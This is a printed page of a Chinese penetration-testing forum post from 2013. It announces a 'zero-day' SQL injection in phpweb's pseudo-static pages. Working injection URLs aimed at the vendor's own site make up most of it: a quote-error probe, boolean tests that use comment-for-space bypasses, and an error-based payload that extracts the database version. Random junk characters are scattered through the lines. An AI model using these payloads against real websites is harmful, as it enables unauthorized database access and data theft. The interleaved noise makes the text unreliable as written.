中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入1 n, c4 \% ^; u6 z! k! [7 \

  j  Q4 F- f9 X4 N; K主站:http://phpweb.net/
: U1 D) Z* ~0 d加’检测:
- {& N* a' z' A/ k+ |$ `
$ o0 F- K# Z. G. c9 z2 I7 bhttp://www.phpweb.net/down/html/?772′.html, l3 L( M  R0 B" _
' i# c, j! r: ?% Z
出错
8 u* Y9 B" E' j5 {7 Y存在注入。
- I# J2 B& w2 S+ `8 O不能用空格,只能用/*罗: O' k+ a' `8 l
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常. r0 v! l7 w* \; B  s" d( o

7 s! N1 f0 E; K5 P' T" Zhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
" J/ T: s1 J5 `- d爆数据库版本:
3 }, _7 v( n# ^7 t! ^ 2 \0 I% i( K( s% U2 x' V
?
. Y  N9 ]( T& H, i0 G* u: V$ T4 I1
: f' A3 b3 g1 ?/ q. ghttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
& U" S2 c. W, @  t- ^更新日期: 2013-01-03 13:39:50        
+ ~4 @; _' V9 ?8 Q



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2